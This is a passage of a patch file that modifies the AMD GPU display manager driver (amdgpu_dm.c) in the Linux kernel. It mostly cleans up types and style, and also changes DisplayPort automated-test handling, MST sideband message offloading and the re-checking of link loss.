++			     amdgpu_crtc->crtc_id,
++			     amdgpu_crtc);
+ 		spin_unlock_irqrestore(&adev_to_drm(adev)->event_lock, flags);
+ 		return;
+ 	}
+@@ -678,7 +681,7 @@ static void dmub_hpd_callback(struct amdgpu_device *adev,
+ 	struct drm_connector *connector;
+ 	struct drm_connector_list_iter iter;
+ 	struct dc_link *link;
+-	uint8_t link_index = 0;
++	u8 link_index = 0;
+ 	struct drm_device *dev;
+ 
+ 	if (adev == NULL)
+@@ -779,7 +782,7 @@ static void dm_dmub_outbox1_low_irq(void *interrupt_params)
+ 	struct amdgpu_device *adev = irq_params->adev;
+ 	struct amdgpu_display_manager *dm = &adev->dm;
+ 	struct dmcub_trace_buf_entry entry = { 0 };
+-	uint32_t count = 0;
++	u32 count = 0;
+ 	struct dmub_hpd_work *dmub_hpd_wrk;
+ 	struct dc_link *plink = NULL;
+ 
+@@ -858,7 +861,7 @@ static int dm_set_powergating_state(void *handle,
+ }
+ 
+ /* Prototypes of private functions */
+-static int dm_early_init(void* handle);
++static int dm_early_init(void *handle);
+ 
+ /* Allocate memory for FBC compressed data  */
+ static void amdgpu_dm_fbc_init(struct drm_connector *connector)
+@@ -1045,7 +1048,7 @@ static int dm_dmub_hw_init(struct amdgpu_device *adev)
+ 	struct dmub_srv_hw_params hw_params;
+ 	enum dmub_status status;
+ 	const unsigned char *fw_inst_const, *fw_bss_data;
+-	uint32_t i, fw_inst_const_size, fw_bss_data_size;
++	u32 i, fw_inst_const_size, fw_bss_data_size;
+ 	bool has_hw_support;
+ 
+ 	if (!dmub_srv)
+@@ -1206,10 +1209,10 @@ static void dm_dmub_hw_resume(struct amdgpu_device *adev)
+ 
+ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_addr_space_config *pa_config)
+ {
+-	uint64_t pt_base;
+-	uint32_t logical_addr_low;
+-	uint32_t logical_addr_high;
+-	uint32_t agp_base, agp_bot, agp_top;
++	u64 pt_base;
++	u32 logical_addr_low;
++	u32 logical_addr_high;
++	u32 agp_base, agp_bot, agp_top;
+ 	PHYSICAL_ADDRESS_LOC page_table_start, page_table_end, page_table_base;
+ 
+ 	memset(pa_config, 0, sizeof(*pa_config));
+@@ -1257,7 +1260,7 @@ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_
+ 	pa_config->system_aperture.start_addr = (uint64_t)logical_addr_low << 18;
+ 	pa_config->system_aperture.end_addr = (uint64_t)logical_addr_high << 18;
+ 
+-	pa_config->system_aperture.agp_base = (uint64_t)agp_base << 24 ;
++	pa_config->system_aperture.agp_base = (uint64_t)agp_base << 24;
+ 	pa_config->system_aperture.agp_bot = (uint64_t)agp_bot << 24;
+ 	pa_config->system_aperture.agp_top = (uint64_t)agp_top << 24;
+ 
+@@ -1273,6 +1276,21 @@ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_
+ 
+ }
+ 
++static void force_connector_state(
++	struct amdgpu_dm_connector *aconnector,
++	enum drm_connector_force force_state)
++{
++	struct drm_connector *connector = &aconnector->base;
++
++	mutex_lock(&connector->dev->mode_config.mutex);
++	aconnector->base.force = force_state;
++	mutex_unlock(&connector->dev->mode_config.mutex);
++
++	mutex_lock(&aconnector->hpd_lock);
++	drm_kms_helper_connector_hotplug_event(connector);
++	mutex_unlock(&aconnector->hpd_lock);
++}
++
+ static void dm_handle_hpd_rx_offload_work(struct work_struct *work)
+ {
+ 	struct hpd_rx_irq_offload_work *offload_work;
+@@ -1281,6 +1299,9 @@ static void dm_handle_hpd_rx_offload_work(struct work_struct *work)
+ 	struct amdgpu_device *adev;
+ 	enum dc_connection_type new_connection_type = dc_connection_none;
+ 	unsigned long flags;
++	union test_response test_response;
++
++	memset(&test_response, 0, sizeof(test_response));
+ 
+ 	offload_work = container_of(work, struct hpd_rx_irq_offload_work, work);
+ 	aconnector = offload_work->offload_wq->aconnector;
+@@ -1304,16 +1325,58 @@ static void dm_handle_hpd_rx_offload_work(struct work_struct *work)
+ 	if (amdgpu_in_reset(adev))
+ 		goto skip;
+ 
++	if (offload_work->data.bytes.device_service_irq.bits.UP_REQ_MSG_RDY ||
++		offload_work->data.bytes.device_service_irq.bits.DOWN_REP_MSG_RDY) {
++		dm_handle_mst_sideband_msg_ready_event(&aconnector->mst_mgr, DOWN_OR_UP_MSG_RDY_EVENT);
++		spin_lock_irqsave(&offload_work->offload_wq->offload_lock, flags);
++		offload_work->offload_wq->is_handling_mst_msg_rdy_event = false;
++		spin_unlock_irqrestore(&offload_work->offload_wq->offload_lock, flags);
++		goto skip;
++	}
++
+ 	mutex_lock(&adev->dm.dc_lock);
+-	if (offload_work->data.bytes.device_service_irq.bits.AUTOMATED_TEST)
++	if (offload_work->data.bytes.device_service_irq.bits.AUTOMATED_TEST) {
+ 		dc_link_dp_handle_automated_test(dc_link);
+-	else if ((dc_link->connector_signal != SIGNAL_TYPE_EDP) &&
++
++		if (aconnector->timing_changed) {
++			/* force connector disconnect and reconnect */
++			force_connector_state(aconnector, DRM_FORCE_OFF);
++			msleep(100);
++			force_connector_state(aconnector, DRM_FORCE_UNSPECIFIED);
++		}
++
++		test_response.bits.ACK = 1;
++
++		core_link_write_dpcd(
++		dc_link,
++		DP_TEST_RESPONSE,
++		&test_response.raw,
++		sizeof(test_response));
++	} else if ((dc_link->connector_signal != SIGNAL_TYPE_EDP) &&
+ 			hpd_rx_irq_check_link_loss_status(dc_link, &offload_work->data) &&
+ 			dc_link_dp_allow_hpd_rx_irq(dc_link)) {
+-		dc_link_dp_handle_link_loss(dc_link);
++		/* offload_work->data is from handle_hpd_rx_irq->
++		 * schedule_hpd_rx_offload_work.this is defer handle
++		 * for hpd short pulse. upon here, link status may be
++		 * changed, need get latest link status from dpcd
++		 * registers. if link status is good, skip run link
++		 * training again.
++		 */
++		union hpd_irq_data irq_data;
++
++		memset(&irq_data, 0, sizeof(irq_data));
++
++		/* before dc_link_dp_handle_link_loss, allow new link lost handle
++		 * request be added to work queue if link lost at end of dc_link_
++		 * dp_handle_link_loss
++		 */
+ 		spin_lock_irqsave(&offload_work->offload_wq->offload_lock, flags);
+ 		offload_work->offload_wq->is_handling_link_loss = false;
+ 		spin_unlock_irqrestore(&offload_work->offload_wq->offload_lock, flags);
++
++		if ((read_hpd_rx_irq_data(dc_link, &irq_data) == DC_OK) &&
++			hpd_rx_irq_check_link_loss_status(dc_link, &irq_data))
++			dc_link_dp_handle_link_loss(dc_link);
+ 	}
+ 	mutex_unlock(&adev->dm.dc_lock);
+ 
+@@ -1482,7 +1545,7 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 	mutex_init(&adev->dm.audio_lock);
+ 	spin_lock_init(&adev->dm.vblank_lock);
+ 
+-	if(amdgpu_dm_irq_init(adev)) {
++	if (amdgpu_dm_irq_init(adev)) {
+ 		DRM_ERROR("amdgpu: failed to initialize DM IRQ support.\n");
+ 		goto error;
+ 	}
+@@ -1617,9 +1680,8 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 	if (amdgpu_dc_debug_mask & DC_DISABLE_STUTTER)
+ 		adev->dm.dc->debug.disable_stutter = true;
+ 
+-	if (amdgpu_dc_debug_mask & DC_DISABLE_DSC) {
++	if (amdgpu_dc_debug_mask & DC_DISABLE_DSC)
+ 		adev->dm.dc->debug.disable_dsc = true;
+-	}
+ 
+ 	if (amdgpu_dc_debug_mask & DC_DISABLE_CLOCK_GATING)
+ 		adev->dm.dc->debug.disable_clock_gate = true;
+@@ -1840,8 +1902,6 @@ static void amdgpu_dm_fini(struct amdgpu_device *adev)
+ 	mutex_destroy(&adev->dm.audio_lock);
+ 	mutex_destroy(&adev->dm.dc_lock);
+ 	mutex_destroy(&adev->dm.dpia_aux_lock);
+-
+-	return;
+ }
+ 
+ static int load_dmcu_fw(struct amdgpu_device *adev)
+@@ -1850,7 +1910,7 @@ static int load_dmcu_fw(struct amdgpu_device *adev)
+ 	int r;
+ 	const struct dmcu_firmware_header_v1_0 *hdr;
+ 
+-	switch(adev->asic_type) {
++	switch (adev->asic_type) {
+ #if defined(CONFIG_DRM_AMD_DC_SI)
+ 	case CHIP_TAHITI:
+ 	case CHIP_PITCAIRN:
+@@ -2536,7 +2596,7 @@ struct amdgpu_dm_connector *
+ amdgpu_dm_find_first_crtc_matching_connector(struct drm_atomic_state *state,
+ 					     struct drm_crtc *crtc)
+ {
+-	uint32_t i;
++	u32 i;
+ 	struct drm_connector_state *new_con_state;
+ 	struct drm_connector *connector;
+ 	struct drm_crtc *crtc_from_state;
+@@ -2642,7 +2702,7 @@ static void dm_gpureset_commit_state(struct dc_state *dc_state,
+ 		struct dc_scaling_info scaling_infos[MAX_SURFACES];
+ 		struct dc_flip_addrs flip_addrs[MAX_SURFACES];
+ 		struct dc_stream_update stream_update;
+-	} * bundle;
++	} *bundle;
+ 	int k, m;
+ 
+ 	bundle = kzalloc(sizeof(*bundle), GFP_KERNEL);
+@@ -2672,8 +2732,6 @@ static void dm_gpureset_commit_state(struct dc_state *dc_state,
+ 
+ cleanup:
+ 	kfree(bundle);
+-
+-	return;
+ }
+ 
+ static int dm_resume(void *handle)
+@@ -2887,8 +2945,7 @@ static const struct amd_ip_funcs amdgpu_dm_funcs = {
+ 	.set_powergating_state = dm_set_powergating_state,
+ };
+ 
+-const struct amdgpu_ip_block_version dm_ip_block =
+-{
++const struct amdgpu_ip_block_version dm_ip_block = {
+ 	.type = AMD_IP_BLOCK_TYPE_DCE,
+ 	.major = 1,
+ 	.minor = 0,
+@@ -2945,9 +3002,12 @@ static void update_connector_ext_caps(struct amdgpu_dm_connector *aconnector)
+ 	caps->ext_caps = &aconnector->dc_link->dpcd_sink_ext_caps;
+ 	caps->aux_support = false;
+ 
+-	if (caps->ext_caps->bits.oled == 1 /*||
+-	    caps->ext_caps->bits.sdr_aux_backlight_control == 1 ||
+-	    caps->ext_caps->bits.hdr_aux_backlight_control == 1*/)
++	if (caps->ext_caps->bits.oled == 1
++	    /*
++	     * ||
++	     * caps->ext_caps->bits.sdr_aux_backlight_control == 1 ||
++	     * caps->ext_caps->bits.hdr_aux_backlight_control == 1
++	     */)
+ 		caps->aux_support = true;
+ 
+ 	if (amdgpu_backlight == 0)
+@@ -3076,6 +3136,10 @@ void amdgpu_dm_update_connector_after_detect(
+ 						    aconnector->edid);
+ 		}
+ 
++		aconnector->timing_requested = kzalloc(sizeof(struct dc_crtc_timing), GFP_KERNEL);
++		if (!aconnector->timing_requested)
++			dm_error("%s: failed to create aconnector->requested_timing\n", __func__);
++
+ 		drm_connector_update_edid_property(connector, aconnector->edid);
+ 		amdgpu_dm_update_freesync_caps(connector, aconnector->edid);
+ 		update_connector_ext_caps(aconnector);
+@@ -3087,6 +3151,8 @@ void amdgpu_dm_update_connector_after_detect(
+ 		dc_sink_release(aconnector->dc_sink);
+ 		aconnector->dc_sink = NULL;
+ 		aconnector->edid = NULL;
++		kfree(aconnector->timing_requested);
++		aconnector->timing_requested = NULL;
+ #ifdef CONFIG_DRM_AMD_DC_HDCP
+ 		/* Set CP to DESIRED if it was ENABLED, so we can re-enable it again on hotplug */
+ 		if (connector->state->content_protection == DRM_MODE_CONTENT_PROTECTION_ENABLED)
+@@ -3131,6 +3197,8 @@ static void handle_hpd_irq_helper(struct amdgpu_dm_connector *aconnector)
+ 	if (aconnector->fake_enable)
+ 		aconnector->fake_enable = false;
+ 
++	aconnector->timing_changed = false;
++
+ 	if (!dc_link_detect_sink(aconnector->dc_link, &new_connection_type))
+ 		DRM_ERROR("KMS: Failed to detect connector\n");
+ 
+@@ -3170,84 +3238,6 @@ static void handle_hpd_irq(void *param)
+ 
+ }
+ 
+-static void dm_handle_mst_sideband_msg(struct amdgpu_dm_connector *aconnector)
+-{
+-	uint8_t esi[DP_PSR_ERROR_STATUS - DP_SINK_COUNT_ESI] = { 0 };
+-	uint8_t dret;
+-	bool new_irq_handled = false;
+-	int dpcd_addr;
+-	int dpcd_bytes_to_read;
+-
+-	const int max_process_count = 30;
+-	int process_count = 0;
+-
+-	const struct dc_link_status *link_status = dc_link_get_status(aconnector->dc_link);
+-
+-	if (link_status->dpcd_caps->dpcd_rev.raw < 0x12) {
+-		dpcd_bytes_to_read = DP_LANE0_1_STATUS - DP_SINK_COUNT;
+-		/* DPCD 0x200 - 0x201 for downstream IRQ */
+-		dpcd_addr = DP_SINK_COUNT;
+-	} else {
+-		dpcd_bytes_to_read = DP_PSR_ERROR_STATUS - DP_SINK_COUNT_ESI;
+-		/* DPCD 0x2002 - 0x2005 for downstream IRQ */
+-		dpcd_addr = DP_SINK_COUNT_ESI;
+-	}
+-
+-	dret = drm_dp_dpcd_read(
+-		&aconnector->dm_dp_aux.aux,
+-		dpcd_addr,
+-		esi,
+-		dpcd_bytes_to_read);
+-
+-	while (dret == dpcd_bytes_to_read &&
+-		process_count < max_process_count) {
+-		uint8_t retry;
+-		dret = 0;
+-
+-		process_count++;
+-
+-		DRM_DEBUG_DRIVER("ESI %02x %02x %02x\n", esi[0], esi[1], esi[2]);
+-		/* handle HPD short pulse irq */
+-		if (aconnector->mst_mgr.mst_state)
+-			drm_dp_mst_hpd_irq(
+-				&aconnector->mst_mgr,
+-				esi,
+-				&new_irq_handled);
+-
+-		if (new_irq_handled) {
+-			/* ACK at DPCD to notify down stream */
+-			const int ack_dpcd_bytes_to_write =
+-				dpcd_bytes_to_read - 1;
+-
+-			for (retry = 0; retry < 3; retry++) {
+-				uint8_t wret;
+-
+-				wret = drm_dp_dpcd_write(
+-					&aconnector->dm_dp_aux.aux,
+-					dpcd_addr + 1,
+-					&esi[1],
+-					ack_dpcd_bytes_to_write);
+-				if (wret == ack_dpcd_bytes_to_write)
+-					break;
+-			}
+-
+-			/* check if there is new irq to be handled */
+-			dret = drm_dp_dpcd_read(
+-				&aconnector->dm_dp_aux.aux,
+-				dpcd_addr,
+-				esi,
+-				dpcd_bytes_to_read);
+-
+-			new_irq_handled = false;
+-		} else {
+-			break;
+-		}
+-	}
+-
+-	if (process_count == max_process_count)
+-		DRM_DEBUG_DRIVER("Loop exceeded max iterations\n");
+-}
+-
+ static void schedule_hpd_rx_offload_work(struct hpd_rx_irq_offload_work_queue *offload_wq,
+ 							union hpd_irq_data hpd_irq_data)
+ {
+@@ -3280,7 +3270,7 @@ static void handle_hpd_rx_irq(void *param)
+ 	union hpd_irq_data hpd_irq_data;
+ 	bool link_loss = false;
+ 	bool has_left_work = false;
+-	int idx = aconnector->base.index;
++	int idx = dc_link->link_index;
+ 	struct hpd_rx_irq_offload_work_queue *offload_wq = &adev->dm.hpd_rx_offload_wq[idx];
+ 
+ 	memset(&hpd_irq_data, 0, sizeof(hpd_irq_data));
+@@ -3309,7 +3299,23 @@ static void handle_hpd_rx_irq(void *param)
+ 	if (dc_link_dp_allow_hpd_rx_irq(dc_link)) {
+ 		if (hpd_irq_data.bytes.device_service_irq.bits.UP_REQ_MSG_RDY ||
+ 			hpd_irq_data.bytes.device_service_irq.bits.DOWN_REP_MSG_RDY) {
+-			dm_handle_mst_sideband_msg(aconnector);
++			bool skip = false;
++
++			/*
++			 * DOWN_REP_MSG_RDY is also handled by polling method
++			 * mgr->cbs->poll_hpd_irq()
++			 */
++			spin_lock(&offload_wq->offload_lock);
++			skip = offload_wq->is_handling_mst_msg_rdy_event;
++
++			if (!skip)
++				offload_wq->is_handling_mst_msg_rdy_event = true;
++
++			spin_unlock(&offload_wq->offload_lock);
++
++			if (!skip)
++				schedule_hpd_rx_offload_work(offload_wq, hpd_irq_data);
++
+ 			goto out;
+ 		}
+ 
+@@ -3402,7 +3408,7 @@ static void register_hpd_handlers(struct amdgpu_device *adev)
+ 		aconnector = to_amdgpu_dm_connector(connector);
+ 		dc_link = aconnector->dc_link;
+ 
+-		if (DC_IRQ_SOURCE_INVALID != dc_link->irq_source_hpd) {
++		if (dc_link->irq_source_hpd != DC_IRQ_SOURCE_INVALID) {
+ 			int_params.int_context = INTERRUPT_LOW_IRQ_CONTEXT;
+ 			int_params.irq_source = dc_link->irq_source_hpd;
+ 
+@@ -3411,7 +3417,7 @@ static void register_hpd_handlers(struct amdgpu_device *adev)
+ 					(void *) aconnector);
+ 		}
+ 
+-		if (DC_IRQ_SOURCE_INVALID != dc_link->irq_source_hpd_rx) {
++		if (dc_link->irq_source_hpd_rx != DC_IRQ_SOURCE_INVALID) {
+ 
+ 			/* Also register for DP short pulse (hpd_rx). */
+ 			int_params.int_context = INTERRUPT_LOW_IRQ_CONTEXT;
+@@ -3420,11 +3426,11 @@ static void register_hpd_handlers(struct amdgpu_device *adev)
+ 			amdgpu_dm_irq_register_interrupt(adev, &int_params,
+ 					handle_hpd_rx_irq,
+ 					(void *) aconnector);
+-
+-			if (adev->dm.hpd_rx_offload_wq)
+-				adev->dm.hpd_rx_offload_wq[connector->index].aconnector =
+-					aconnector;
+ 		}
++
++		if (adev->dm.hpd_rx_offload_wq)
++			adev->dm.hpd_rx_offload_wq[connector->index].aconnector =
++				aconnector;
+ 	}
+ }
+ 
+@@ -3437,7 +3443,7 @@ static int dce60_register_irq_handlers(struct amdgpu_device *adev)
+ 	struct dc_interrupt_params int_params = {0};
+ 	int r;
+ 	int i;
+-	unsigned client_id = AMDGPU_IRQ_CLIENTID_LEGACY;
++	unsigned int client_id = AMDGPU_IRQ_CLIENTID_LEGACY;
+ 
+ 	int_params.requested_polarity = INTERRUPT_POLARITY_DEFAULT;
+ 	int_params.current_polarity = INTERRUPT_POLARITY_DEFAULT;
+@@ -3451,11 +3457,12 @@ static int dce60_register_irq_handlers(struct amdgpu_device *adev)
+ 	 *    Base driver will call amdgpu_dm_irq_handler() for ALL interrupts
+ 	 *    coming from DC hardware.
+ 	 *    amdgpu_dm_irq_handler() will re-direct the interrupt to DC
+-	 *    for acknowledging and handling. */
++	 *    for acknowledging and handling.
++	 */
+ 
+ 	/* Use VBLANK interrupt */
+ 	for (i = 0; i < adev->mode_info.num_crtc; i++) {
+-		r = amdgpu_irq_add_id(adev, client_id, i+1 , &adev->crtc_irq);
++		r = amdgpu_irq_add_id(adev, client_id, i + 1, &adev->crtc_irq);
+ 		if (r) {
+ 			DRM_ERROR("Failed to add crtc irq id!\n");
+ 			return r;
+@@ -3463,7 +3470,7 @@ static int dce60_register_irq_handlers(struct amdgpu_device *adev)
+ 
+ 		int_params.int_context = INTERRUPT_HIGH_IRQ_CONTEXT;
+ 		int_params.irq_source =
+-			dc_interrupt_to_irq_source(dc, i+1 , 0);
++			dc_interrupt_to_irq_source(dc, i + 1, 0);
+ 
+ 		c_irq_params = &adev->dm.vblank_params[int_params.irq_source - DC_IRQ_SOURCE_VBLANK1];
+ 
+@@ -3519,7 +3526,7 @@ static int dce110_register_irq_handlers(struct amdgpu_device *adev)
+ 	struct dc_interrupt_params int_params = {0};
+ 	int r;
+ 	int i;
+-	unsigned client_id = AMDGPU_IRQ_CLIENTID_LEGACY;
++	unsigned int client_id = AMDGPU_IRQ_CLIENTID_LEGACY;
+ 
+ 	if (adev->family >= AMDGPU_FAMILY_AI)
+ 		client_id = SOC15_IH_CLIENTID_DCE;
+@@ -3536,7 +3543,8 @@ static int dce110_register_irq_handlers(struct amdgpu_device *adev)
+ 	 *    Base driver will call amdgpu_dm_irq_handler() for ALL interrupts
+ 	 *    coming from DC hardware.
+ 	 *    amdgpu_dm_irq_handler() will re-direct the interrupt to DC
+-	 *    for acknowledging and handling. */
++	 *    for acknowledging and handling.
++	 */
+ 
+ 	/* Use VBLANK interrupt */
+ 	for (i = VISLANDS30_IV_SRCID_D1_VERTICAL_INTERRUPT0; i <= VISLANDS30_IV_SRCID_D6_VERTICAL_INTERRUPT0; i++) {
+@@ -3985,7 +3993,7 @@ static void amdgpu_dm_update_backlight_caps(struct amdgpu_display_manager *dm,
+ }
+ 
+ static int get_brightness_range(const struct amdgpu_dm_backlight_caps *caps,
+-				unsigned *min, unsigned *max)
++				unsigned int *min, unsigned int *max)
+ {
+ 	if (!caps)
+ 		return 0;
+@@ -4005,7 +4013,7 @@ static int get_brightness_range(const struct amdgpu_dm_backlight_caps *caps,
+ static u32 convert_brightness_from_user(const struct amdgpu_dm_backlight_caps *caps,
+ 					uint32_t brightness)
+ {
+-	unsigned min, max;
++	unsigned int min, max;
+ 
+ 	if (!get_brightness_range(caps, &min, &max))
+ 		return brightness;
+@@ -4018,7 +4026,7 @@ static u32 convert_brightness_from_user(const struct amdgpu_dm_backlight_caps *c
+ static u32 convert_brightness_to_user(const struct amdgpu_dm_backlight_caps *caps,
+ 				      uint32_t brightness)
+ {
+-	unsigned min, max;
++	unsigned int min, max;
+ 
+ 	if (!get_brightness_range(caps, &min, &max))
+ 		return brightness;
+@@ -4236,12 +4244,12 @@ static void amdgpu_set_panel_orientation(struct drm_connector *connector);
+ static int amdgpu_dm_initialize_drm_device(struct amdgpu_device *adev)
+ {
+ 	struct amdgpu_display_manager *dm = &adev->dm;
+-	int32_t i;
++	s32 i;
+ 	struct amdgpu_dm_connector *aconnector = NULL;
+ 	struct amdgpu_encoder *aencoder = NULL;
+ 	struct amdgpu_mode_info *mode_info = &adev->mode_info;
+-	uint32_t link_cnt;
+-	int32_t primary_planes;
++	u32 link_cnt;
++	s32 primary_planes;
+ 	enum dc_connection_type new_connection_type = dc_connection_none;
+ 	const struct dc_plane_cap *plane;
+ 	bool psr_feature_enabled = false;
+@@ -4499,7 +4507,6 @@ fail:
+ static void amdgpu_dm_destroy_drm_device(struct amdgpu_display_manager *dm)
+ {
+ 	drm_atomic_private_obj_fini(&dm->atomic_obj);
+-	return;
+ }
+ 
+ /******************************************************************************
+@@ -4768,7 +4775,7 @@ fill_plane_color_attributes(const struct drm_plane_state *plane_state,
+ static int
+ fill_dc_plane_info_and_addr(struct amdgpu_device *adev,
+ 			    const struct drm_plane_state *plane_state,
+-			    const uint64_t tiling_flags,
++			    const u64 tiling_flags,
+ 			    struct dc_plane_info *plane_info,
+ 			    struct dc_plane_address *address,
+ 			    bool tmz_surface,
+@@ -4977,7 +4984,7 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 	uint32_t num_clips;
+ 	bool bb_changed;
+ 	bool fb_changed;
+-	uint32_t i = 0;
++	u32 i = 0;
+ 
+ 	flip_addrs->dirty_rect_count = 0;
+ 
+@@ -5111,7 +5118,7 @@ static enum dc_color_depth
+ convert_color_depth_from_display_info(const struct drm_connector *connector,
+ 				      bool is_y420, int requested_bpc)
+ {
+-	uint8_t bpc;
++	u8 bpc;
+ 
+ 	if (is_y420) {
+ 		bpc = 8;
+@@ -5225,6 +5232,7 @@ static bool adjust_colour_depth_from_display_info(
+ {
+ 	enum dc_color_depth depth = timing_out->display_color_depth;
+ 	int normalized_clk;
++
+ 	do {
+ 		normalized_clk = timing_out->pix_clk_100hz / 10;
+ 		/* YCbCr 4:2:0 requires additional adjustment of 1/2 */
+@@ -5440,6 +5448,7 @@ create_fake_sink(struct amdgpu_dm_connector *aconnector)
+ {
+ 	struct dc_sink_init_data sink_init_data = { 0 };
+ 	struct dc_sink *sink = NULL;
++
+ 	sink_init_data.link = aconnector->dc_link;
+ 	sink_init_data.sink_signal = aconnector->dc_link->connector_signal;
+ 
+@@ -5563,7 +5572,7 @@ get_highest_refresh_rate_mode(struct amdgpu_dm_connector *aconnector,
+ 		return &aconnector->freesync_vid_base;
+ 
+ 	/* Find the preferred mode */
+-	list_for_each_entry (m, list_head, head) {
++	list_for_each_entry(m, list_head, head) {
+ 		if (m->type & DRM_MODE_TYPE_PREFERRED) {
+ 			m_pref = m;
+ 			break;
+@@ -5587,7 +5596,7 @@ get_highest_refresh_rate_mode(struct amdgpu_dm_connector *aconnector,
+ 	 * For some monitors, preferred mode is not the mode with highest
+ 	 * supported refresh rate.
+ 	 */
+-	list_for_each_entry (m, list_head, head) {
++	list_for_each_entry(m, list_head, head) {
+ 		current_refresh  = drm_mode_vrefresh(m);
+ 
+ 		if (m->hdisplay == m_pref->hdisplay &&
+@@ -5655,8 +5664,8 @@ static void apply_dsc_policy_for_edp(struct amdgpu_dm_connector *aconnector,
+ 				    uint32_t max_dsc_target_bpp_limit_override)
+ {
+ 	const struct dc_link_settings *verified_link_cap = NULL;
+-	uint32_t link_bw_in_kbps;
+-	uint32_t edp_min_bpp_x16, edp_max_bpp_x16;
++	u32 link_bw_in_kbps;
++	u32 edp_min_bpp_x16, edp_max_bpp_x16;
+ 	struct dc *dc = sink->ctx->dc;
+ 	struct dc_dsc_bw_range bw_range = {0};
+ 	struct dc_dsc_config dsc_cfg = {0};
+@@ -5713,17 +5722,15 @@ static void apply_dsc_policy_for_stream(struct amdgpu_dm_connector *aconnector,
+ 					struct dsc_dec_dpcd_caps *dsc_caps)
+ {
+ 	struct drm_connector *drm_connector = &aconnector->base;
+-	uint32_t link_bandwidth_kbps;
+-	uint32_t max_dsc_target_bpp_limit_override = 0;
++	u32 link_bandwidth_kbps;
+ 	struct dc *dc = sink->ctx->dc;
+-	uint32_t max_supported_bw_in_kbps, timing_bw_in_kbps;
+-	uint32_t dsc_max_supported_bw_in_kbps;
++	u32 max_supported_bw_in_kbps, timing_bw_in_kbps;
++	u32 dsc_max_supported_bw_in_kbps;
++	u32 max_dsc_target_bpp_limit_override =
++		drm_connector->display_info.max_dsc_bpp;
+ 
+ 	link_bandwidth_kbps = dc_link_bandwidth_kbps(aconnector->dc_link,
+ 							dc_link_get_link_cap(aconnector->dc_link));
+-	if (stream->link && stream->link->local_sink)
+-		max_dsc_target_bpp_limit_override =
+-			stream->link->local_sink->edid_caps.panel_patch.max_dsc_target_bpp_limit;
+ 
+ 	/* Set DSC policy according to dsc_clock_en */
+ 	dc_dsc_policy_set_enable_dsc_when_not_needed(
+@@ -5860,7 +5867,7 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 		 * This may not be an error, the use case is when we have no
+ 		 * usermode calls to reset and set mode upon hotplug. In this
+ 		 * case, we call set mode ourselves to restore the previous mode
+-		 * and the modelist may not be filled in in time.
++		 * and the modelist may not be filled in time.
+ 		 */
+ 		DRM_DEBUG_DRIVER("No preferred mode found\n");
+ 	} else {
+@@ -5884,9 +5891,9 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 		drm_mode_set_crtcinfo(&mode, 0);
+ 
+ 	/*
+-	* If scaling is enabled and refresh rate didn't change
+-	* we copy the vic and polarities of the old timings
+-	*/
++	 * If scaling is enabled and refresh rate didn't change
++	 * we copy the vic and polarities of the old timings
++	 */
+ 	if (!scale || mode_refresh != preferred_refresh)
+ 		fill_stream_properties_from_drm_display_mode(
+ 			stream, &mode, &aconnector->base, con_state, NULL,
+@@ -5896,6 +5903,14 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 			stream, &mode, &aconnector->base, con_state, old_stream,
+ 			requested_bpc);
+ 
++	if (aconnector->timing_changed) {
++		DC_LOG_DEBUG("%s: overriding timing for automated test, bpc %d, changing to %d\n",
++				__func__,
++				stream->timing.display_color_depth,
++				aconnector->timing_requested->display_color_depth);
++		stream->timing = *aconnector->timing_requested;
++	}
++
+ #if defined(CONFIG_DRM_AMD_DC_DCN)
+ 	/* SST DSC determination policy */
+ 	update_dsc_caps(aconnector, sink, stream, &dsc_caps);
+@@ -6540,6 +6555,7 @@ static int dm_encoder_helper_atomic_check(struct drm_encoder *encoder,
+ 
+ 	if (!state->duplicated) {
+ 		int max_bpc = conn_state->max_requested_bpc;
++
+ 		is_y420 = drm_mode_is_420_also(&connector->display_info, adjusted_mode) &&
+ 			  aconnector->force_yuv420_output;
+ 		color_depth = convert_color_depth_from_display_info(connector,
+@@ -6860,7 +6876,7 @@ static bool is_duplicate_mode(struct amdgpu_dm_connector *aconnector,
+ {
+ 	struct drm_display_mode *m;
+ 
+-	list_for_each_entry (m, &aconnector->base.probed_modes, head) {
++	list_for_each_entry(m, &aconnector->base.probed_modes, head) {
+ 		if (drm_mode_equal(m, mode))
+ 			return true;
+ 	}
+@@ -6873,7 +6889,7 @@ static uint add_fs_modes(struct amdgpu_dm_connector *aconnector)
+ 	const struct drm_display_mode *m;
+ 	struct drm_display_mode *new_mode;
+ 	uint i;
+-	uint32_t new_modes_count = 0;
++	u32 new_modes_count = 0;
+ 
+ 	/* Standard FPS values
+ 	 *
+@@ -6887,7 +6903,7 @@ static uint add_fs_modes(struct amdgpu_dm_connector *aconnector)
+ 	 * 60 	        - Commonly used
+ 	 * 48,72,96,120 - Multiples of 24
+ 	 */
+-	static const uint32_t common_rates[] = {
++	static const u32 common_rates[] = {
+ 		23976, 24000, 25000, 29970, 30000,
+ 		48000, 50000, 60000, 72000, 96000, 120000
+ 	};
+@@ -6903,8 +6919,8 @@ static uint add_fs_modes(struct amdgpu_dm_connector *aconnector)
+ 		return 0;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(common_rates); i++) {
+-		uint64_t target_vtotal, target_vtotal_diff;
+-		uint64_t num, den;
++		u64 target_vtotal, target_vtotal_diff;
++		u64 num, den;
+ 
+ 		if (drm_mode_vrefresh(m) * 1000 < common_rates[i])
+ 			continue;
+@@ -6972,13 +6988,7 @@ static int amdgpu_dm_connector_get_modes(struct drm_connector *connector)
+ 				drm_add_modes_noedid(connector, 640, 480);
+ 	} else {
+ 		amdgpu_dm_connector_ddc_get_modes(connector, edid);
+-		/* most eDP supports only timings from its edid,
+-		 * usually only detailed timings are available
+-		 * from eDP edid. timings which are not from edid
+-		 * may damage eDP
+-		 */
+-		if (connector->connector_type != DRM_MODE_CONNECTOR_eDP)
+-			amdgpu_dm_connector_add_common_modes(encoder, connector);
++		amdgpu_dm_connector_add_common_modes(encoder, connector);
+ 		amdgpu_dm_connector_add_freesync_modes(connector, edid);
+ 	}
+ 	amdgpu_dm_fbc_init(connector);
